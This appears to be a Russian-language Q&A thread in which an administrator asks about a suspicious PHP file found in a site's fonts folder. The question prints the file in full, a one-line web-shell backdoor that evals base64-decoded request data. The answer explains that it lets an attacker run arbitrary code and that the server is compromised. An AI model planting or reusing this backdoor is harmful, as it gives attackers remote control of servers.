Возможный дубликат:
Как мне поступить с взломанным сервером?
Проверил lfd.log и заметил блокировку скрипта:
Jan 10 22:01:36 xxx lfd[871]: *User Processing* PID:27023 Kill:0 User:xxxx Time:610472 EXE:/usr/bin/php CMD:/usr/bin/php /home/xxxx/public_html/fonts/article5.class.inc.php
Похоже, скрипт пытается выполнить / usr / bin / php, но когда я вижу код, это простой однострочный файл
<?php
function_exists('date_default_timezone') ? date_default_timezone_set('America/Los_Angeles') : @eval(base64_decode($_REQUEST['c_id']));
У кого-нибудь есть подобный опыт, и есть ли способ узнать, что вызывает вызов / usr / bin / php? Журналы говорят, что скрипт вызывается через POST.
Кто-то поместил в этот каталог сценарий атаки. Если eval
не деактивирован в вашей конфигурации PHP, это позволит злоумышленнику выполнить произвольный код PHP, который он отправляет вместе с запросом.
Сценарий вызывается с помощью простого запроса HTTP POST.
Вы должны считать вашу систему скомпрометированной и попытаться выяснить, как злоумышленнику удалось разместить этот скрипт.